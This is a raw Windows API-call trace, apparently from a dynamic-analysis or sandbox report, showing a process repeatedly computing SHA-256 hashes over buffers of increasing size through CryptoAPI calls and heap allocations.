	[0208.035] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b0e30
	[0208.035] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26b0e30, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b0e30, pdwDataLen=0x129364) returned 1
	[0208.035] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0208.035] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.035] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.035] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.035] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0xd40, dwFlags=0x0) returned 1
	[0208.035] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.035] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b0e58
	[0208.035] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b0e58, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b0e58, pdwDataLen=0x129364) returned 1
	[0208.035] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.035] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.035] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.035] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.035] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0xd60, dwFlags=0x0) returned 1
	[0208.036] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.036] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b0e80
	[0208.036] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26b0e80, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b0e80, pdwDataLen=0x129364) returned 1
	[0208.036] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0208.036] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.036] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.036] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.036] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0xd80, dwFlags=0x0) returned 1
	[0208.036] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.036] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b0ea8
	[0208.036] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b0ea8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b0ea8, pdwDataLen=0x129364) returned 1
	[0208.036] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.036] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.036] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.036] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.037] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0xda0, dwFlags=0x0) returned 1
	[0208.037] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.037] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b0ed0
	[0208.037] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26b0ed0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b0ed0, pdwDataLen=0x129364) returned 1
	[0208.037] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0208.037] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.037] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.037] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.037] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0xdc0, dwFlags=0x0) returned 1
	[0208.037] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.037] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b0ef8
	[0208.037] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b0ef8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b0ef8, pdwDataLen=0x129364) returned 1
	[0208.037] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.037] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.037] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.038] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.038] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0xde0, dwFlags=0x0) returned 1
	[0208.038] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.038] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b0f20
	[0208.038] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26b0f20, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b0f20, pdwDataLen=0x129364) returned 1
	[0208.038] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0208.038] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.038] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.038] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.038] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0xe00, dwFlags=0x0) returned 1
	[0208.038] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.038] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b0f48
	[0208.038] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b0f48, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b0f48, pdwDataLen=0x129364) returned 1
	[0208.038] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.038] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.038] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.039] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.039] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0xe20, dwFlags=0x0) returned 1
	[0208.039] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.039] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b0f70
	[0208.039] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26b0f70, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b0f70, pdwDataLen=0x129364) returned 1
	[0208.039] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0208.039] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.039] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.039] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.039] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0xe40, dwFlags=0x0) returned 1
	[0208.039] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.039] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b0f98
	[0208.039] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b0f98, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b0f98, pdwDataLen=0x129364) returned 1
	[0208.039] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.039] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.039] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.040] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.040] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0xe60, dwFlags=0x0) returned 1
	[0208.040] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.040] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b0fc0
	[0208.040] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26b0fc0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b0fc0, pdwDataLen=0x129364) returned 1
	[0208.040] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0208.040] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.040] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.040] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.040] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0xe80, dwFlags=0x0) returned 1
	[0208.040] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.040] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b0fe8
	[0208.040] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b0fe8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b0fe8, pdwDataLen=0x129364) returned 1
	[0208.040] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.040] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.040] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.041] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.041] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0xea0, dwFlags=0x0) returned 1
	[0208.041] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.041] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1010
	[0208.041] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26b1010, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1010, pdwDataLen=0x129364) returned 1
	[0208.041] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0208.041] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.041] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.041] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.041] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0xec0, dwFlags=0x0) returned 1
	[0208.041] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.041] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1038
	[0208.041] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b1038, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1038, pdwDataLen=0x129364) returned 1
	[0208.041] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.041] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.041] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.042] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.042] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0xee0, dwFlags=0x0) returned 1
	[0208.042] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.042] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1060
	[0208.042] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26b1060, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1060, pdwDataLen=0x129364) returned 1
	[0208.042] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0208.042] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.042] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.042] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.042] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0xf00, dwFlags=0x0) returned 1
	[0208.042] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.247] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1088
	[0208.247] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b1088, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1088, pdwDataLen=0x129364) returned 1
	[0208.247] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.247] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.247] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.248] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.248] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0xf20, dwFlags=0x0) returned 1
	[0208.248] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.248] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b10b0
	[0208.248] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26b10b0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b10b0, pdwDataLen=0x129364) returned 1
	[0208.248] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0208.249] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.249] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.249] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.249] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0xf40, dwFlags=0x0) returned 1
	[0208.249] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.249] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b10d8
	[0208.249] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b10d8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b10d8, pdwDataLen=0x129364) returned 1
	[0208.249] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.250] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.250] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.250] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.250] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0xf60, dwFlags=0x0) returned 1
	[0208.250] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.250] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1100
	[0208.250] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26b1100, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1100, pdwDataLen=0x129364) returned 1
	[0208.250] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0208.250] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.250] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.251] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.251] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0xf80, dwFlags=0x0) returned 1
	[0208.251] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.251] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1128
	[0208.251] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b1128, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1128, pdwDataLen=0x129364) returned 1
	[0208.251] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.251] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.251] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.251] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.251] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0xfa0, dwFlags=0x0) returned 1
	[0208.251] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.251] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1150
	[0208.251] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26b1150, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1150, pdwDataLen=0x129364) returned 1
	[0208.251] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0208.251] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.252] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.252] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.252] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0xfc0, dwFlags=0x0) returned 1
	[0208.252] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.252] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1178
	[0208.252] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b1178, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1178, pdwDataLen=0x129364) returned 1
	[0208.252] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.252] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.252] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.253] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.253] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0xfe0, dwFlags=0x0) returned 1
	[0208.253] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.253] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b11a0
	[0208.253] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26b11a0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b11a0, pdwDataLen=0x129364) returned 1
	[0208.253] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0208.253] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.253] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.253] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.253] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x1000, dwFlags=0x0) returned 1
	[0208.253] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.253] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b11c8
	[0208.253] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b11c8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b11c8, pdwDataLen=0x129364) returned 1
	[0208.253] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.253] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.253] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x275fc38) returned 1
	[0208.253] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x1000) returned 0x275fc38
	[0208.254] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.254] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.254] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0x20, dwFlags=0x0) returned 1
	[0208.254] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.254] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b11f0
	[0208.254] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26b11f0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b11f0, pdwDataLen=0x129364) returned 1
	[0208.254] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0208.254] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.254] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.255] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.255] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x40, dwFlags=0x0) returned 1
	[0208.255] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.255] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1218
	[0208.255] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b1218, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1218, pdwDataLen=0x129364) returned 1
	[0208.255] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.255] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
